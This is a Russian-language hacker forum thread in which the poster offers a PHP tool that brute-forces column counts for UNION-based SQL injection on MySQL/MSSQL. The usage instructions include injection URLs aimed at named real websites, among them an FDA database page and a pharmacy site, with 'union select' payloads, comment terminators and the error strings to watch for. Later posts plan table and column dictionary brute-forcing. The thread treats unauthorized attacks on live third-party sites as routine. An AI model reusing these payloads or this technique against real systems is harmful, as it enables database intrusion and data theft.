|
Скрипт для перебора полей my/ms sql.
Вот написал.
_http://pidor.in/sql-scan.php Как юзать. host Код:
www.accessdata.fda.govКод:
/scripts/cder/onctools/studies.cfm?ID=1+union+select+Код:
--Код:
must have an equal number of expressionsКод:
200Внимае в колонку ошибка вводить данные ошибки колва столбцов. это может быть 1 слово или фраза главное что бы она не встретилась при выводе с нулями... Смотрим ошибку. http://www.accessdata.fda.gov/scripts/cder/onctools/studies.cfm?ID=1+union+select+1-- При точном кол ве полей она другая. |
Малясь оптимизировал работу.
Теперь гараздо быстрее... Планируеться седать перебор колонок и таблиц. Кто хочет помочь можете постить заумные названия колонки и таблиц. Просьба постить с пометкой колонки это или таблицы. |
Пример на php
host :www.pharm-system.com left : /index.phtml?page=news&id=-1+union+select+ right : /* erorr : Error in query 2 The used SELECT statements have a different number of columns (смотрим тут http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1/*) coll : 30 |
Можно для перебора имен таблиц добавить еще и префикс. А то часто такое бывает, вроде и имена должны быть стандартные, набираешь, а нифига.
|
Еще одно обновление.
Не как не могу разобраться с перебором таблиц. Скоро будет добавленна опция debug. И перебор таблиц. |
перебор по словарю? имхо на пхп слишком энергоемко )
|
Почему словарь будет небольшой... порядка 40 записей...
Все в масив и по 1 подставлять... |
[ cash ]
Ты бы сорец выложил... |
Сорец распространяться не будет.
|
[ cash ] - а жаль
|
| Время: 22:49 |